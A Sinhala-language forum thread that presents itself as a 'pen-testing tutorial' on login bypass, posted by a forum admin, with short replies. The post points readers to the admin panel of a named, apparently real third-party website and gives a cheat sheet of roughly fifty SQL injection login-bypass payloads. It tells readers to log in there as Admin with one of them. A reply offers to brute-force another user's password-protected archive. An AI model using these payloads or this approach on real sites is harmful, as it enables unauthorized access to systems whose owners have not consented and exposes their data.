ඔබ තවමත් Widane Forums සාමාජිකයෙක් නෙවෙයි ද..?

Widane Forums හි සියළුම ලිපිවල ඇති සියළුම Links වෙත පිවිසීමට නම් ලියාපදිංචිවීම අනිවාර්යයි.
ඔබගේ සියලුම තාක්ෂණික ගැටළු සඳහා විසඳුම් සොගැනීමට වගේම දැනුම බෙදාගැනීම සඳහා මෙහි ඉඩකඩ වෙන්කර තිබෙනවා.
ඉතින් ඇයි තවත් බලාගෙන ඉන්නේ ඉක්මනින් ලියාපදිංචිවී ඔබගේ දැනුම වැඩිකරගන්න.

Register Here




[Tut] Pen-testing tutorial - 003 [තේරෙන සිංහලෙන්] | Login Bypass
#1
Star 
Pen-testing tutorial - 003 [තේරෙන සිංහලෙන්] | Login Bypass

හායි හැමෝටම, දවසින් දෙකෙන් දෙන්නම් කියලා හිතාගෙන හිටපු එක දෙන්නම සෑහෙන කාලයක් ගියා. වැඩ ගොඩකට අහුවුන නිසා බිසී වෙලා හිටියෙ. අදත් අරගෙන ආවෙ තවත් Pentesting Tut එකක්. කලින් දවසෙදිත් අපි Vul එකක් හොයලා SQL වලින් Inject කලා. මතක ඇතිනෙ අද කියලා දෙන්න යන්නෙ Bypass එකක් කරගන්න විදිහ. Big Grin Big Grin

හරි ඉතින් අපි අදත් බලමු මොනවද කරන්න පුළුවන් කියලා. අපි අද කරන්න යන්නෙ පුංචි ගේමක් දෙන්න. මේවා නිසා තමයි ලොකු ලොකු හැකර්ස්ලා බිහි වෙලා ඉන්නෙත්. ඒ නිසා මුල ඉදන්ම ඉගෙනගන්න එක වටිනවනෙ. Sad

අදත් අපිට සයිට් එකක් හොයාගන්න වෙනවා. මම උදාහරනෙට ගන්නෙ අපි කලින් දවසෙ ගත්ත සයිට් එකමයි. haha

[To see links please login or register here]


දැන් ඉතින් මම හිතනවා මේ සීරීස් එකත් එක්ක ඉන්න හැමෝටම Dork එකක් හදාගන්න විදිහ ගැන අමුතුවෙන් කියලා දෙන්න ඕනෙ නෑ.

දන් නැති කෙනෙක් ඉන්නවා නම් මේ පෝස්ට් 2 බලන්න.

[To see links please login or register here]

[To see links please login or register here]


කලින් ටියුට් ටික ඕනෙනම් මෙතනින් බලන්න.

[To see links please login or register here]

[To see links please login or register here]


හරි එහෙනම් අපි මේ සයිට් එකේ Admin Panel එක හොයාගමු පොඩි Search එකකින්. මම Dork එක හදාගන්නවා මේ විදිහට. Smile


මම කලිනුත් කිව්වා මේවට Bing Use කරනවා නම් හොදයි කියලා. මොකද ඒකෙ හොද Crawler එකක් තියනවා. මේක නම් Google Search කලත් එනවා. ඒ නිසා අවුලක් නෑ. මට නම් එක සර්ච් රිසාල්ට් එකයි ආවෙ. Big Grin Big Grin

ඒකෙ URL එක තියෙන්නෙ මේ විදිහට.

Admin Panel | World Tradexpert
worldtradexperts.com/admin/

අපි ගිහින්ම බලමු ඒකට.

මේකෙ Input field දෙකක් සහ Submit Button එකක් පේන්න තියනවා. Angel

අපිට දැන් එකින් එකට බලන්න වෙනවා Username සහ Password වලට මොනවද දෙන්නෙ කියලා.

ඒත් එහෙම කලේ ඉස්සර. අපි මේක Bypass කරන්න බලමු.

සාමාන්‍යයෙන් මේවගෙ Username එකට use කරන්නෙ Admin කියලමයි. Tongue

එතකොට දාන Password එක......!

ඒකට CheatSheet එකක්ම තියනවා. Huh


Code:
or 1=1
or 1=1--
or 1=1#
or 1=1/*
' or '1'='1
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055


මම මෙතනදි ගන්නම් ' or '1'='1 මේක. උඩු කමා අරවා මේවා හරියට තියෙන්න ඕනෙ ඈ. love

හරි නිකමට වගේ Username එකට Admin දාලා Password එකට ' or '1'='1 දාලා Login වෙන්න බලන්න. මොකද උනේ වැඩේ ගොඩ නේද? හරියට දැම්මා නම් Log වෙන්න පුළුවන් වෙන්න ඕනෙ. Confused

හැබැයි ඉතිං මතක තියාගන්න ඕනෙ. මේවා හැම එකටම හරියන් නෑ. WP, MyBB, Vanilla, Xenforo වගේ CMS ගොඩකට දැන් මේක වැඩ නෑ. වැඩ කරන ඒවත් තියනවා. හරි ඒනම් මම යනවා. Dodgy

පුළුවන් විදිහට Training වෙන්න. අනිත් ටියුට් ටිකත් ඉක්මනටම දෙන්නම්. Shy Shy

Elite_x 
(Admin & Marketing Officer)

Widane Forums
Contact Me: [email protected]
Admin Queries: [email protected]
General Queries:

[To see links please login or register here]

 
#2
Star 
Ftta ayyeh
Elama
Tongue
Reply
#3
හායි ......................
Reply
#4
එලම,බන්ග්??
Reply
#5
Supiriya bn
Reply
#6
7 zip password dapu ekak crack karaganna widiyak kiyanna puluwnda.
Reply
#7
(03-05-2019, 09:56 AM)Samee Wrote: 7 zip password dapu ekak crack karaganna widiyak kiyanna puluwnda.

Brute Force Attarcker 1ක් තිබුනා. සයිස් 1 පොඩි 1ක් නම් මෙතනට දාන්න. අපි කඩලා දෙන්නම් පාස් එක

Elite_x 
(Admin & Marketing Officer)

Widane Forums
Contact Me: [email protected]
Admin Queries: [email protected]
General Queries:

[To see links please login or register here]

 
Reply
#8
20mb file ekak. Kohomada file ekak add krnne methanata. Thanks.
Menna meka drive link eka. indicator ekak forex.

[To see links please login or register here]

Reply
#9
iFrame injection
Damn.. There's a little bit of devil in her angel eyelove love

1
Reply
#10
(03-06-2019, 02:42 AM)Mmx Wrote: iFrame injection

ඉස්සරහට දෙනවා මචං. දැන්ම දුන්නම ඇඩ්වාන්ස් වැඩි වෙයිද දන් නෑ.

Elite_x 
(Admin & Marketing Officer)

Widane Forums
Contact Me: [email protected]
Admin Queries: [email protected]
General Queries:

[To see links please login or register here]

 
1
1
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [Tut] Sql injection - login bypassing ph03n1x 10 2,846 11-21-2019, 05:32 AM
Last Post: sahasra
Wink [Tut] Reflected XSS tutorial ph03n1x 6 850 07-06-2019, 04:08 AM
Last Post: Radix
  [Tut] Sql injection - login bypassing - part 2 ph03n1x 10 3,823 06-07-2019, 08:25 PM
Last Post: CypRoot
Star [Tut] Pen-testing tutorial - 003 [තේරෙන සිංහලෙන්] | Login Bypass - Video Tutorial Elite_x 1 772 05-07-2019, 05:18 AM
Last Post: Mmx
Star [Tut] Pen-testing tutorial - 002 [තේරෙන සිංහලෙන්] | SQL injection Elite_x 19 5,036 03-26-2019, 10:58 AM
Last Post: holmantora
Star [Tut] Pen-testing tutorial - 001 [තේරෙන සිංහලෙන්] Elite_x 14 5,301 01-29-2019, 01:02 PM
Last Post: OWL99



Users browsing this thread: 1 Guest(s)